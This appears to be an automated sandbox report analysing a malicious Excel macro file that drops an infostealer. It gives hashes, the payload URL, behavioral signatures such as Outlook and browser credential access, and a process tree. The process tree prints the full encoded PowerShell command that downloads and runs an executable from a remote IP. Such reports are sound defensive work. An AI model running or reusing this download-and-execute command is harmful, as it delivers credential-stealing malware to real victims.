Analysis
-
max time kernel
121s -
max time network
146s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
25-11-2021 16:54
Static task
static1
Behavioral task
behavioral1
Sample
CSOIYQRONAGPE1.xlsm
Resource
win7-en-20211104
Behavioral task
behavioral2
Sample
CSOIYQRONAGPE1.xlsm
Resource
win10-en-20211014
General
-
Target
CSOIYQRONAGPE1.xlsm
-
Size
102KB
-
MD5
cc1439b54aa4b3db324fb921b94870ef
-
SHA1
33a4c8af524b8e37f290000c654d897b440fd86c
-
SHA256
95b3882e2ba6d5f35be8c35aa3d047e41ec110eb7f8aa69af7652f1cc29a6fb7
-
SHA512
a9fb3881f480ca8dd86bb707b8216b596f4a848e25c797c15fb6c57b517beafe1fb2ddeb2d56321faf17e049bae4147582fd4052e7e1153962c0f7a6085fd4dc
Malware Config
Extracted
http://18.192.215.191/team/z/CSOIYQRONAGPE1.exe
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 872 2716 cmd.exe EXCEL.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 35 2808 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
Khlmdccppqkpdqrfhwdjw.exeKhlmdccppqkpdqrfhwdjw.exeKhlmdccppqkpdqrfhwdjw.exepid process 2112 Khlmdccppqkpdqrfhwdjw.exe 1656 Khlmdccppqkpdqrfhwdjw.exe 1288 Khlmdccppqkpdqrfhwdjw.exe -
Deletes itself 1 IoCs
Processes:
EXCEL.EXEpid process 2716 EXCEL.EXE -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
Khlmdccppqkpdqrfhwdjw.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Khlmdccppqkpdqrfhwdjw.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Khlmdccppqkpdqrfhwdjw.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Khlmdccppqkpdqrfhwdjw.exe -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 41 checkip.dyndns.org 44 freegeoip.app 45 freegeoip.app -
Suspicious use of SetThreadContext 1 IoCs
Processes:
Khlmdccppqkpdqrfhwdjw.exedescription pid process target process PID 2112 set thread context of 1288 2112 Khlmdccppqkpdqrfhwdjw.exe Khlmdccppqkpdqrfhwdjw.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
NTFS ADS 1 IoCs
Processes:
EXCEL.EXEdescription ioc process File created C:\Users\Admin\AppData\Local\Temp\B8167F00\:Zone.Identifier:$DATA EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 2716 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
powershell.exeKhlmdccppqkpdqrfhwdjw.exeKhlmdccppqkpdqrfhwdjw.exepid process 2808 powershell.exe 2808 powershell.exe 2808 powershell.exe 2112 Khlmdccppqkpdqrfhwdjw.exe 2112 Khlmdccppqkpdqrfhwdjw.exe 2112 Khlmdccppqkpdqrfhwdjw.exe 2112 Khlmdccppqkpdqrfhwdjw.exe 2112 Khlmdccppqkpdqrfhwdjw.exe 2112 Khlmdccppqkpdqrfhwdjw.exe 2112 Khlmdccppqkpdqrfhwdjw.exe 1288 Khlmdccppqkpdqrfhwdjw.exe -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
EXCEL.EXEpid process 2716 EXCEL.EXE -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exeKhlmdccppqkpdqrfhwdjw.exeKhlmdccppqkpdqrfhwdjw.exedescription pid process Token: SeDebugPrivilege 2808 powershell.exe Token: SeDebugPrivilege 2112 Khlmdccppqkpdqrfhwdjw.exe Token: SeDebugPrivilege 1288 Khlmdccppqkpdqrfhwdjw.exe -
Suspicious use of SetWindowsHookEx 22 IoCs
Processes:
EXCEL.EXEpid process 2716 EXCEL.EXE 2716 EXCEL.EXE 2716 EXCEL.EXE 2716 EXCEL.EXE 2716 EXCEL.EXE 2716 EXCEL.EXE 2716 EXCEL.EXE 2716 EXCEL.EXE 2716 EXCEL.EXE 2716 EXCEL.EXE 2716 EXCEL.EXE 2716 EXCEL.EXE 2716 EXCEL.EXE 2716 EXCEL.EXE 2716 EXCEL.EXE 2716 EXCEL.EXE 2716 EXCEL.EXE 2716 EXCEL.EXE 2716 EXCEL.EXE 2716 EXCEL.EXE 2716 EXCEL.EXE 2716 EXCEL.EXE -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
EXCEL.EXEcmd.exepowershell.exeKhlmdccppqkpdqrfhwdjw.exedescription pid process target process PID 2716 wrote to memory of 872 2716 EXCEL.EXE cmd.exe PID 2716 wrote to memory of 872 2716 EXCEL.EXE cmd.exe PID 872 wrote to memory of 2808 872 cmd.exe powershell.exe PID 872 wrote to memory of 2808 872 cmd.exe powershell.exe PID 2808 wrote to memory of 2112 2808 powershell.exe Khlmdccppqkpdqrfhwdjw.exe PID 2808 wrote to memory of 2112 2808 powershell.exe Khlmdccppqkpdqrfhwdjw.exe PID 2808 wrote to memory of 2112 2808 powershell.exe Khlmdccppqkpdqrfhwdjw.exe PID 2112 wrote to memory of 1656 2112 Khlmdccppqkpdqrfhwdjw.exe Khlmdccppqkpdqrfhwdjw.exe PID 2112 wrote to memory of 1656 2112 Khlmdccppqkpdqrfhwdjw.exe Khlmdccppqkpdqrfhwdjw.exe PID 2112 wrote to memory of 1656 2112 Khlmdccppqkpdqrfhwdjw.exe Khlmdccppqkpdqrfhwdjw.exe PID 2112 wrote to memory of 1288 2112 Khlmdccppqkpdqrfhwdjw.exe Khlmdccppqkpdqrfhwdjw.exe PID 2112 wrote to memory of 1288 2112 Khlmdccppqkpdqrfhwdjw.exe Khlmdccppqkpdqrfhwdjw.exe PID 2112 wrote to memory of 1288 2112 Khlmdccppqkpdqrfhwdjw.exe Khlmdccppqkpdqrfhwdjw.exe PID 2112 wrote to memory of 1288 2112 Khlmdccppqkpdqrfhwdjw.exe Khlmdccppqkpdqrfhwdjw.exe PID 2112 wrote to memory of 1288 2112 Khlmdccppqkpdqrfhwdjw.exe Khlmdccppqkpdqrfhwdjw.exe PID 2112 wrote to memory of 1288 2112 Khlmdccppqkpdqrfhwdjw.exe Khlmdccppqkpdqrfhwdjw.exe PID 2112 wrote to memory of 1288 2112 Khlmdccppqkpdqrfhwdjw.exe Khlmdccppqkpdqrfhwdjw.exe PID 2112 wrote to memory of 1288 2112 Khlmdccppqkpdqrfhwdjw.exe Khlmdccppqkpdqrfhwdjw.exe -
outlook_office_path 1 IoCs
Processes:
Khlmdccppqkpdqrfhwdjw.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Khlmdccppqkpdqrfhwdjw.exe -
outlook_win_path 1 IoCs
Processes:
Khlmdccppqkpdqrfhwdjw.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Khlmdccppqkpdqrfhwdjw.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\CSOIYQRONAGPE1.xlsm"1⤵
- Deletes itself
- Checks processor information in registry
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: RenamesItself
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\Vpxldboqapmd.bat2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBLAGgAbABtAGQAYwBjAHAAcABxAGsAcABkAHEAcgBmAGgAdwBkAGoAdwAuAGUAeABlACIAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAIgBoAHQAdABwADoALwAvADEAOAAuADEAOQAyAC4AMgAxADUALgAxADkAMQAvAHQAZQBhAG0ALwB6AC8AQwBTAE8ASQBZAFEAUgBPAE4AQQBHAFAARQAxAC4AZQB4AGUAIgAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAKAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAJABQAHIAbwBjAE4AYQBtAGUAIgApAA==3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Khlmdccppqkpdqrfhwdjw.exe"C:\Users\Admin\AppData\Roaming\Khlmdccppqkpdqrfhwdjw.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Khlmdccppqkpdqrfhwdjw.exeC:\Users\Admin\AppData\Local\Temp\Khlmdccppqkpdqrfhwdjw.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Khlmdccppqkpdqrfhwdjw.exeC:\Users\Admin\AppData\Local\Temp\Khlmdccppqkpdqrfhwdjw.exe5⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Khlmdccppqkpdqrfhwdjw.exe.logMD5
cc46a3a52a041a89732c2ec30a9651e3
SHA1d2be4fb16cf40bdaf751ffb54937be0b566c3aed
SHA2568b50302a8f47723cd8e4fae2f86ad219c21030f240941aa1f3c0ca08c73a70b9
SHA512b7975573ddaa1fcfa4c63c7cf7ccb96680b69a2ffaf449c4729760423ecd5470185daf207c9c795d91a4631021bc331fc6a5fa834270bfbdac236262d6835fa8
-
C:\Users\Admin\AppData\Local\Temp\Khlmdccppqkpdqrfhwdjw.exeMD5
a28c434e703d9d0961f526f87a61109c
SHA1c18ce22d993ee202d7c4e91aeda8f602a1ddb054
SHA2561a58c708f0c8b203949c9f180813f7fd6665b2f7bbf6f474b39d94e3d6638a30
SHA512a380bd060f69d0813fa1c1141fc960225fbeb1a13195ed7349a2d0f7d3ad72e9b37df4f2f8afe45ac8b6bf4997fdc5bac69d9ec93123a1ef5e8f0871dc29e72d
-
C:\Users\Admin\AppData\Local\Temp\Khlmdccppqkpdqrfhwdjw.exeMD5
a28c434e703d9d0961f526f87a61109c
SHA1c18ce22d993ee202d7c4e91aeda8f602a1ddb054
SHA2561a58c708f0c8b203949c9f180813f7fd6665b2f7bbf6f474b39d94e3d6638a30
SHA512a380bd060f69d0813fa1c1141fc960225fbeb1a13195ed7349a2d0f7d3ad72e9b37df4f2f8afe45ac8b6bf4997fdc5bac69d9ec93123a1ef5e8f0871dc29e72d
-
C:\Users\Admin\AppData\Local\Temp\Khlmdccppqkpdqrfhwdjw.exeMD5
a28c434e703d9d0961f526f87a61109c
SHA1c18ce22d993ee202d7c4e91aeda8f602a1ddb054
SHA2561a58c708f0c8b203949c9f180813f7fd6665b2f7bbf6f474b39d94e3d6638a30
SHA512a380bd060f69d0813fa1c1141fc960225fbeb1a13195ed7349a2d0f7d3ad72e9b37df4f2f8afe45ac8b6bf4997fdc5bac69d9ec93123a1ef5e8f0871dc29e72d
-
C:\Users\Admin\AppData\Roaming\Khlmdccppqkpdqrfhwdjw.exeMD5
a28c434e703d9d0961f526f87a61109c
SHA1c18ce22d993ee202d7c4e91aeda8f602a1ddb054
SHA2561a58c708f0c8b203949c9f180813f7fd6665b2f7bbf6f474b39d94e3d6638a30
SHA512a380bd060f69d0813fa1c1141fc960225fbeb1a13195ed7349a2d0f7d3ad72e9b37df4f2f8afe45ac8b6bf4997fdc5bac69d9ec93123a1ef5e8f0871dc29e72d
-
C:\Users\Admin\AppData\Roaming\Khlmdccppqkpdqrfhwdjw.exeMD5
a28c434e703d9d0961f526f87a61109c
SHA1c18ce22d993ee202d7c4e91aeda8f602a1ddb054
SHA2561a58c708f0c8b203949c9f180813f7fd6665b2f7bbf6f474b39d94e3d6638a30
SHA512a380bd060f69d0813fa1c1141fc960225fbeb1a13195ed7349a2d0f7d3ad72e9b37df4f2f8afe45ac8b6bf4997fdc5bac69d9ec93123a1ef5e8f0871dc29e72d
-
C:\Users\Admin\Documents\Vpxldboqapmd.batMD5
eb57c3c8f7622d52e5ea78fcbcf2d9b2
SHA1ec417981a3089cb8c72a78fbff71051fb8bd20d0
SHA256ec93f90790e65f73486f769f4ae33aea3f099f06ae20febdffa2e91b5abb289d
SHA512a6873254a3fc69cbd6234d3b6cdf780ece9ac498eecbcc9adef4c4274f5288dbc0bf5a89d016a8730569913b8c00edd93b390f0b46c3c1a6ba235c6f4200805f
-
memory/872-266-0x0000000000000000-mapping.dmp
-
memory/1288-335-0x0000000004FD0000-0x00000000054CE000-memory.dmpFilesize
5.0MB
-
memory/1288-327-0x00000000004204CE-mapping.dmp
-
memory/2112-311-0x0000000005860000-0x0000000005D5E000-memory.dmpFilesize
5.0MB
-
memory/2112-301-0x0000000000000000-mapping.dmp
-
memory/2716-121-0x0000020276260000-0x0000020276262000-memory.dmpFilesize
8KB
-
memory/2716-122-0x0000020276260000-0x0000020276262000-memory.dmpFilesize
8KB
-
memory/2716-115-0x00007FFD922E0000-0x00007FFD922F0000-memory.dmpFilesize
64KB
-
memory/2716-120-0x0000020276260000-0x0000020276262000-memory.dmpFilesize
8KB
-
memory/2716-119-0x00007FFD922E0000-0x00007FFD922F0000-memory.dmpFilesize
64KB
-
memory/2716-118-0x00007FFD922E0000-0x00007FFD922F0000-memory.dmpFilesize
64KB
-
memory/2716-117-0x00007FFD922E0000-0x00007FFD922F0000-memory.dmpFilesize
64KB
-
memory/2716-116-0x00007FFD922E0000-0x00007FFD922F0000-memory.dmpFilesize
64KB
-
memory/2808-300-0x000002583F3C6000-0x000002583F3C8000-memory.dmpFilesize
8KB
-
memory/2808-291-0x000002583F3C3000-0x000002583F3C5000-memory.dmpFilesize
8KB
-
memory/2808-290-0x000002583F3C0000-0x000002583F3C2000-memory.dmpFilesize
8KB
-
memory/2808-268-0x0000000000000000-mapping.dmp